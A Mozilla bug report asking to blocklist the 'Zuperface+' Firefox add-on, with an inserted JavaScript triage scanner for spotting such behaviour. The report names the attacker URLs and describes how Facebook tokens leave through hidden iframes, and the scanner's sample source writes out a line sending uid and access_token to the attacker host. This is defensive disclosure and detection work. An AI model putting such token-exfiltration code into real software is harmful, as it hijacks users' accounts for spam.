Closed Bug 729356 Opened 13 years ago Closed 13 years ago

Malicious "Zuperface+" add-on

Product/Component: Toolkit :: Blocklist Policy Requests
Type: defect
Priority: Not set
Severity: normal
Status: RESOLVED FIXED

People

(Reporter: mhammell, Assigned: jorgev)

Details

(Whiteboard: [Read comment #6 before posting!])

Attachments (1 file): 20120221 zuperface.zip (562.71 KB, application/octet-stream)
Comment 0 (mhammell, reporter):

Attached file 20120221 zuperface.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11

Steps to reproduce:

Downloaded the extension from http://www.zuperface.com/firefox.html

Actual results:

addon loads adobeflashplayer.js

adobeflashplayer.js:
- sets/reads state from local storage
- sets up debugging options
- if it's on a facebook domain, it injects http://speed.zuperface.com/zuperface.js
- if it's on a google domain, it injects http://speed.zuperface.com/g.js

zuperface.js:
- Grabs your basic details via http://graph.facebook.com/<uid>&callback=cins
- Injects http://speed.zuperface.com/offline.js if it's turned off, otherwise injects http://speed.zuperface.com/zaza.js; both injects pass your UID to their server as GET params
- Calls http://super.zuperface.com/reklam.html, which loads an image tag to http://whos.amung.us/widget/ksuw9d7f54el.png

zaja.js (several versions of this, based on the value of the 'cins' GET param):
- cins=3: Injects a hidden iframe to http://speed.zuperface.com/letsgo.html? which includes your FB tokens for posting as GET params. Makes a POST to http://www.facebook.com/ajax/follow/manage_subscriptions.php, to subscribe to FB user 1520948160
- cins=1: Injects a hidden iframe of http://speed.zuperface.com/tokmak.php? which includes your FB open graph token, UID, sex, and an FB application ID as GET params

letsgo.html:
- has the following FB app IDs: ['6802152230','176901472156','291549705119','5085647995']
- Creates an iframe for each app ID to http://173.244.196.29/~zuperfac/speed/sol.html? which includes your FB tokens for posting as GET params

sol.html:
- Posts to http://www.facebook.com/connect/uiserver.php to give the passed in app ID full permissions to your Facebook account.

Password on the attached zip is 'infected'

Expected results:

It should not steal your Facebook user information/tokens; it should not give FB applications full access to your Facebook account without your consent.
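The report above describes three behaviours a blocklist reviewer can look for statically in an add-on's JavaScript: a remote script fetched from a third-party host while the code branches on a target site name, identity or token material assembled into GET parameters destined for that host, and a hidden iframe used as the carrier. The following triage scanner is an added example written for this page; it is not the add-on's code (which exists only in the password-protected attachment) nor anything from Mozilla's tooling. The sample source it scans is constructed to mimic the reported behaviour, and the lists of sensitive hosts and parameter names are assumptions chosen for the example.

```javascript
'use strict';

// Hosts the report names as the add-on's injection targets. Treating these
// as sensitive first-party sites is this example's assumption.
const SENSITIVE_HOSTS = ['facebook.com', 'google.com'];

// Query-string keys that carry identity or authorization material. The list
// is an assumption for triage; the report only says "UID" and "FB tokens".
const SENSITIVE_PARAMS = ['access_token', 'oauth_token', 'token', 'fb_dtsg', 'uid'];

// Absolute http(s) URLs in the source, cut at quotes/whitespace so that a
// URL built by concatenation still yields its scheme, host and path prefix.
const URL_RE = /https?:\/\/[^\s'"`<>)]+/g;
// Single- or double-quoted string literals (template literals are ignored).
const STRING_LIT_RE = /(['"])((?:\\.|(?!\1)[^\\\n])*)\1/g;
// "key=" at the start of a literal or after ? or &: a query key being built.
const QUERY_KEY_RE = /(?:^|[?&])([A-Za-z0-9_]+)=/g;

function hostMatches(host, base) {
  return host === base || host.endsWith('.' + base);
}

function isSensitiveHost(host) {
  return SENSITIVE_HOSTS.some(base => hostMatches(host, base));
}

function parseUrl(raw) {
  try { return new URL(raw); } catch { return null; }
}

// Unique, parseable URLs found anywhere in the source text.
function extractUrls(source) {
  return Array.from(new Set(source.match(URL_RE) || []), parseUrl).filter(Boolean);
}

// Query keys that appear inside string literals, lower-cased and de-duplicated.
function extractQueryKeys(source) {
  const keys = new Set();
  for (const lit of source.matchAll(STRING_LIT_RE)) {
    for (const m of lit[2].matchAll(QUERY_KEY_RE)) keys.add(m[1].toLowerCase());
  }
  return [...keys];
}

function scanExtensionSource(source) {
  const findings = [];
  const urls = extractUrls(source);
  const thirdParty = urls.filter(u => !isSensitiveHost(u.hostname));
  // Sensitive sites the source names, e.g. a hostname check used as a gate.
  const gatedOn = SENSITIVE_HOSTS.filter(h => source.includes(h));

  // 1. Remote .js loaded from a third-party host (remote code injection).
  for (const u of thirdParty) {
    if (u.pathname.endsWith('.js')) {
      findings.push({ kind: 'remote-script-injection', url: u.href, gatedOn });
    }
  }

  // 2. Identity/token keys assembled into a query string while the source
  //    also references a third-party host: the tokens-as-GET-params pattern.
  const leaked = extractQueryKeys(source).filter(k => SENSITIVE_PARAMS.includes(k));
  const sinks = [...new Set(thirdParty.map(u => u.hostname))];
  if (leaked.length && sinks.length) {
    findings.push({ kind: 'token-exfiltration', params: leaked, sinks });
  }

  // 3. An iframe that is created and then hidden, the carrier for the hops.
  const makesIframe = /createElement\(\s*['"]iframe['"]\s*\)/.test(source);
  const hidesIt = /(display\s*[:=]\s*['"]?none|(?:width|height)\s*[:=]\s*['"]?0\b)/.test(source);
  if (makesIframe && hidesIt) findings.push({ kind: 'hidden-iframe' });

  return findings;
}

// Constructed sample that reproduces the behaviour comment 0 describes. This
// is NOT the add-on's actual code; only the shape of the behaviour is copied.
const SAMPLE_SOURCE = `
if (location.hostname.endsWith('facebook.com')) {
  var s = document.createElement('script');
  s.src = 'http://speed.zuperface.com/zuperface.js';
  document.head.appendChild(s);
}
var f = document.createElement('iframe');
f.style.display = 'none';
f.src = 'http://speed.zuperface.com/letsgo.html?uid=' + uid + '&access_token=' + token;
document.body.appendChild(f);
`;

console.log(JSON.stringify(scanExtensionSource(SAMPLE_SOURCE), null, 2));
```

The scanner is deliberately a heuristic: it cannot see what the remotely loaded scripts do, which is exactly why the report's dynamic analysis of zuperface.js and letsgo.html mattered. What static triage can establish is that the add-on pulls code from a host it branches on, and that it ships identity material to that host, which is enough to justify downloading and inspecting the remote scripts.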
Comment 1:

This looks like a very elaborate Facebook customization add-on. I tested for a while and didn't see any bad behavior, like pages or apps suddenly added to my account. Even if it did that, it's insufficient for blocklisting. Any privacy concerns should be voiced to the developers of this add-on, so they can fix them.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID
Comment 2:

Jorge,

You won't see any visible bad behavior easily with this one, aside from a new person your Facebook account is subscribed to. The only other evidence you'll see in an account is four new FB apps installed. The problem, however, is that the four FB apps it installs are given full permissions to your account. That means they can post as you, from their own servers, whenever they want. As a result, we see significant amounts of spam coming from the bad actor's infrastructure, using the compromised accounts.
Comment 3:

The add-on itself is not malicious in nature, compromising users' security or causing major stability problems. This doesn't qualify for blocklisting.
Comment 4:

Jorge,

The add-on downloads malicious JS to get full access to a person's Facebook account. That means their email address, their name, their phone number, the ability to post messages as them, to remove content as them, ... This one is more malicious than the other add-ons that were blocked in the past.
Comment 5:

I disagree. The other add-ons you have posted have the intent to deceive users and take advantage of them. They use shady temporary domains, change their code ever so slightly and distribute over and over. This add-on looks like it has been worked on significantly, and it is actually meant to benefit users. It has the potential to access user information, but so can any add-on. Unless it is actively stealing info and you have evidence of this, I'll err on the side of caution and not blocklist an add-on that looks legitimate.
Comment 6:

We have been given additional information about Zuperface+. It is adding apps to the Facebook accounts of its users, with full access permissions, without their consent. These apps generate spam posts. They are being disabled by Facebook, but the add-on gets new app ids dynamically, indicating malicious intent.

To users of Zuperface+: while this add-on can be useful, it is using your accounts for spamming purposes. We can't allow this, so we have decided to block Zuperface+, at least until they correct their behavior.
Status: RESOLVED → REOPENED
Ever confirmed: true
Resolution: INVALID → ---
Whiteboard: [Read comment #6 before posting!]
Assignee: nobody → jorge
Status: REOPENED → ASSIGNED
Status: ASSIGNED → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit